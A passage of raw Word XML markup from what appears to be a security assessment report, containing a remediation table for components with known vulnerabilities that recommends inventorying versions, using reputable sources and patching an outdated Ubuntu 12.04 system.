            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E379BA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="45323F62" w14:textId="2D9AEC97" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="00E379BA" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="3E2AA722" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="75B07C25" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E979B2B" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="692880AF" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51DD9F07" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="45DEFC8A" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="055AAA28" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="023E7C1A" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="322BB46F" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="51B5C8A3" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="168B267B" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7350092F" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc46402736"/>
      <w:r>
        <w:t xml:space="preserve">Web Application Recommendations – </w:t>
      </w:r>
      <w:r w:rsidR="00F63A7E">
        <w:t>Components With Known Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidR="00F63A7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B89820" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="54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6"/>
        <w:gridCol w:w="2458"/>
        <w:gridCol w:w="1668"/>
      </w:tblGrid>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="0E8F242A" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="05B0DC6B" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="004B7B87" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="6D04B1B6" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="004B7B87" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">      </w:t>
            </w:r>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="4F81BD"/>
          </w:tcPr>
          <w:p w14:paraId="68227FD6" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="004B7B87" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B7B87">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Remediation Effort</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="1C0F739E" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="246B168F" w14:textId="3BDA74E2" w:rsidR="006860F0" w:rsidRPr="00A454B1" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E379BA" w:rsidRPr="00E379BA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Inventory of</w:t>
            </w:r>
            <w:r w:rsidR="005142EA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> all component</w:t>
            </w:r>
            <w:r w:rsidR="00E379BA" w:rsidRPr="00E379BA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007164C7">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>version ware</w:t>
            </w:r>
            <w:r w:rsidR="005142EA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> and OS version </w:t>
            </w:r>
            <w:r w:rsidR="007164C7">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">on critical applications. Research </w:t>
            </w:r>
            <w:r w:rsidR="005142EA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>if the software version has the latest patch and what vulnerabilities have been reported for the version. In the example Ubuntu 12.04 was vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="3B4D2160" w14:textId="71C41579" w:rsidR="006860F0" w:rsidRPr="002469AF" w:rsidRDefault="007164C7" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="190626E9" w14:textId="38D86F69" w:rsidR="006860F0" w:rsidRPr="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005142EA" w:rsidRPr="005142EA">
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="4F0DF459" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="17D32601" w14:textId="09A4BCFD" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="005142EA">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ensure that components listed in inventory come from an official reputable source that has been updated in the past 3 years</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A65B148" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4A4EE47B" w14:textId="0B6304FE" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4FA02DE8" w14:textId="1E6A6B37" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="2E0ED551" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="6563D6B7" w14:textId="2EBF42E7" w:rsidR="006860F0" w:rsidRDefault="005B3E25" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">Remove /Replace any software </w:t>
            </w:r>
            <w:r w:rsidR="00DA390A">
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve">components </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>out of compliance and out of date.  Apply any security patches to OS that are missing. In the example Ubuntu needs to be updated to the latest version and have the appropriate patches applied</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="42312942" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="7308AFB3" w14:textId="20F31311" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="2F49675B" w14:textId="2C1892B1" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="005B3E25" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="54B8BC23" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0A1A544E" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2F20D994" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1A47C0CF" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DBC87F6" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="07B180A7" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="4E166767" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4C89A858" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="580C0E36" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DBE5F1"/>
          </w:tcPr>
          <w:p w14:paraId="618A0A14" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006860F0" w:rsidRPr="004B7B87" w14:paraId="47FC1814" w14:textId="77777777" w:rsidTr="006860F0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5418" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3FA142E9" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2890BFFC" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2521" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5421EA22" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="341FEE0C" w14:textId="77777777" w:rsidR="006860F0" w:rsidRPr="00C41698" w:rsidRDefault="006860F0" w:rsidP="006860F0">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D348950" w14:textId="77777777" w:rsidR="006860F0" w:rsidRDefault="006860F0" w:rsidP="006860F0">
      <w:pPr>
        <w:ind w:left="720"/>
